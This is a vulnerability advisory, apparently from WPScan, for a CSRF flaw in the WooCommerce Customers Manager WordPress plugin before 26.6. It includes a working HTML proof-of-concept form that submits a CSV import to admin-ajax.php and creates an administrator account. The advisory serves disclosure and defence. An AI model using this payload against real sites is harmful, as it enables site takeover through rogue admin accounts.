logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Woocommerce Customers Manager < 26.6 - Arbitrary Account Creation/Update via CSRF

Description

The fixes for https://wpscan.com/vulnerability/126143e0-b0cc-4517-862e-3ac557db744f still allowed the issue to be performed via a CSRF attack.

The upload_csv AJAX action, available to authenticated users, did not have proper CRSF check, allowing attacker to make a logged in user with the manage_woocommerce capability, to call it and import arbitrary users and could lead to new administrator accounts being created.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="upload_csv" />
      <input type="hidden" name="send-notification-email" value="no" />
      <input type="hidden" name="csv" value='ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","[email protected]"' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

woocommerce-customers-manager

Fixed in version 26.6

References

URL

https://blog.wpscan.com/2021/04/08/woocommerce-customers-manager-wordpress-security-vulnerabilities.html

URL

https://codecanyon.net/item/woocommerce-customers-manager/10965432

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

10e2cb9d-7285-4d85-923b-bc1ba97bd51a

Timeline

Publicly Published

2021-03-30 (about 10 months ago)

Added

2021-03-30 (about 10 months ago)

Last Updated

2021-04-09 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin